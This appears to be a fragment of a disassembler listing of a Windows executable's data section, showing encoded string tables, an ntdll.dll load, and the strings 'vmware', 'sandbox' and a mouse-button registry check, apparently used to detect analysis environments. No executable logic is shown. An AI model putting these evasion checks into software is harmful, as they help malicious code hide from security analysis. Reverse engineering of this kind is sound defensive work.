; const CHAR dword_4040A4
dword_4040A4 dd 11782015h, 0D7DF0FDAh, 0C34155E5h, 0F4DB0DEAh, 29h
; DATA XREF: sub_4018F0+85�o
; sub_401C30+1F0�o ...
; const CHAR dword_4040B8
dword_4040B8 dd 16B2C11h, 0E5DC1CFFh, 0F74043F5h, 18CAh ; sub_401C30+223�o ...
; const CHAR dword_4040C8
dword_4040C8 dd 16B2C11h, 0E4DC1CFFh, 0EB4649F2h, 0FEF114ECh, 0
; DATA XREF: sub_4018F0+9F�o
; sub_401C30+262�o ...
; const CHAR dword_4040DC
dword_4040DC dd 1703710h, 0DBC22DEFh, 0FD4143E3h, 0E9D905C2h, 2522h
; DATA XREF: sub_4018F0+AC�o
; sub_401C30+28C�o ...
; const CHAR dword_4040F0
dword_4040F0 dd 216D2014h, 0D5D50FE2h, 0E05D65E4h, 0F2CC05FBh, 0
; DATA XREF: sub_4018F0+B9�o
; sub_401C30+2C8�o ...
; const CHAR dword_404104
dword_404104 dd 6A2015h, 0DCE418E7h, 0EA5343F2h, 0 ; sub_401C30+2F2�o ...
; const CHAR dword_404114
dword_404114 dd 6762904h, 0DAD135EFh, 574AE4h ; sub_401C30+325�o ...
; const CHAR dword_404120
dword_404120 dd 186B2013h, 0C0D113E3h, 0E14076E5h, 0F5C705ECh, 0
; DATA XREF: sub_4018F0+E0�o
; sub_401C30+358�o ...
; const CHAR dword_404134
dword_404134 dd 16B2C11h, 0F2DC1CFFh, 5743F2h ; sub_401C30+3A1�o ...
; const CHAR dword_404140
dword_404140 dd 107C2914h, 0FAh ; sub_401C30+427�o ...
; const CHAR dword_404148
dword_404148 dd 396D2014h, 0D8D11EE5h, 0EB5F4FD4h, 0 ; sub_401C30+3C1�o ...
; const CHAR byte_404158
byte_404158 db 0 ; DATA XREF: sub_4018F0+FA�o
; sub_401C30+3F4�o ...
db 20h, 6Dh, 39h
dd 0D8D11EE5h, 0EB5F4FD4h, 0
; const CHAR dword_404168
dword_404168 dd 36753115h, 0C6C010E5h, 0CC4155E5h, 0E3D206FAh, 22h
; DATA XREF: sub_4018F0+121�o
; sub_401C30+45A�o ...
; const CHAR dword_40417C
dword_40417C dd 31753115h, 0D9DF1EEFh, 0FD5754F0h, 0E0C122FCh, 0FF3936h
; DATA XREF: sub_4018F0+12E�o
; sub_401C30+48D�o ...
; const CHAR dword_404190
dword_404190 dd 32753115h, 0DBF309EFh, 0EB4056EDh, 0E9DD13FCh, 0F1E20B3Eh
; DATA XREF: sub_4018F0+13B�o
; sub_401C30+4CC�o ...
dd 0C49B18ADh, 9432AE75h, 0D51Eh
; const CHAR dword_4041B0
dword_4041B0 dd 147C3704h, 0DDF618FEh, 7343ECh ; sub_401C30+4F6�o ...
; const CHAR dword_4041BC
dword_4041BC dd 11782015h, 0D1DC14CCh, 0 ; sub_401C30+529�o ...
; const CHAR byte_4041C8
byte_4041C8 db 0 ; DATA XREF: sub_4018F0+16F�o
; sub_401C30+56C�o ...
db 20h, 6Dh, 33h
dd 0E7D511E3h, 0CB575CE9h, 0F7h
; const CHAR dword_4041D8
dword_4041D8 dd 336D2014h, 0E4D511E3h, 0FA5C4FEFh, 12EAh ; sub_401C30+58F�o ...
; char aO[]
aO db '&!o' ; DATA XREF: sub_4018F0+1E�o
; sub_401C30+55�o ...
db 14h
dd 868314FAh, 0E25E42AEh, 0
; const CHAR byte_4041F8
byte_4041F8 db 0 ; DATA XREF: sub_4018F0+17C�o
; sub_401C30+5C2�o ...
db 20h, 6Dh, 20h
dd 0FAC218F9h, 0CF574BE1h, 0
; const CHAR dword_404208
dword_404208 dd 3A7E2015h, 0FFDE18FAh, 735FE5h ; sub_401C30+601�o ...
; const CHAR dword_404214
dword_404214 dd 247E2015h, 0CDC218FFh, 0FB5E47D6h, 0C7CC25EAh, 0
; DATA XREF: sub_4018F0+196�o
; sub_401C30+62B�o ...
; const CHAR dword_404228
dword_404228 dd 367E2015h, 0D1C312E6h, 4B43CBh ; sub_401C30+65E�o ...
; char LibFileName[]
LibFileName db 'ntdll.dll',0 ; DATA XREF: sub_401520+2�o
align 10h
aVmware db 'vmware',0 ; DATA XREF: sub_4025D0+96�o
align 4
aSandbox db 'sandbox',0 ; DATA XREF: sub_4025D0+77�o
aCurrentuser db 'CurrentUser',0 ; DATA XREF: sub_4025D0+36�o
a0: ; DATA XREF: sub_4026A0+6A�o
unicode 0, <0>,0
aSwapmousebutto db 'SwapMouseButtons',0 ; DATA XREF: sub_4026A0+59�o
align 4
aControlPanelMo db 'Control Panel\Mouse',0 ; DATA XREF: sub_4026A0+24�o
dword_404288 dd 0 ; sub_4018F0+141�w ...
dword_40428C dd 0 ; sub_4018F0+8B�w ...
dword_404290 dd 0 ; sub_401650+1E9�r ...
dword_404294 dd 0 ; sub_4018F0+64�w ...
dword_404298 dd 0 ; sub_4018F0+71�w ...
dword_40429C dd 0 ; sub_4018F0+14E�w ...
dword_4042A0 dd 0 ; sub_4018F0+2AD�r
dword_4042A4 dd 0 ; sub_4018F0+311�r ...
dword_4042A8 dd 0 ; sub_4018F0+7E�w ...
dword_4042AC dd 0 ; sub_4018F0+98�w ...
dword_4042B0 dd 0 ; sub_4018F0+2DF�r ...
dword_4042B4 dd 0 ; sub_4018F0+A5�w ...
dword_4042B8 dd 0 ; sub_4018F0+FF�w ...
dword_4042BC dd 0 ; sub_4018F0+B2�w ...
dword_4042C0 dd 0 ; sub_4018F0+57�w ...
dword_4042C4 dd 0 ; sub_4018F0+2D5�r ...
dword_4042C8 dd 0 ; sub_4018F0+2A3�r
dword_4042CC dd 0 ; sub_4018F0+2F3�r ...
dword_4042D0 dd 0 ; sub_4018F0+D9�w ...
dword_4042D4 dd 0 ; sub_4018F0+2B7�r
dword_4042D8 dd 0 ; sub_4018F0+CC�w ...
dword_4042DC dd 0 ; sub_4018F0+307�r ...
dword_4042E0 dd 0 ; sub_401650+E7�r ...
dword_4042E4 dd 0 ; sub_401650+174�r ...
dword_4042E8 dd 0 ; sub_4018F0+2FD�r ...
dword_4042EC dd 0 ; sub_4026A0+A8�r
dword_4042F0 dd 0 ; sub_4018F0+295�r
dword_4042F4 dd 0 ; sub_4018F0+F3�w ...
dword_4042F8 dd 0 ; sub_4018F0+2E9�r ...
dword_4042FC dd 0 ; sub_4018F0+3D�w ...
; char String2[]
String2 dd 40h dup(0) ; DATA XREF: start+BA�o
_data ends
end start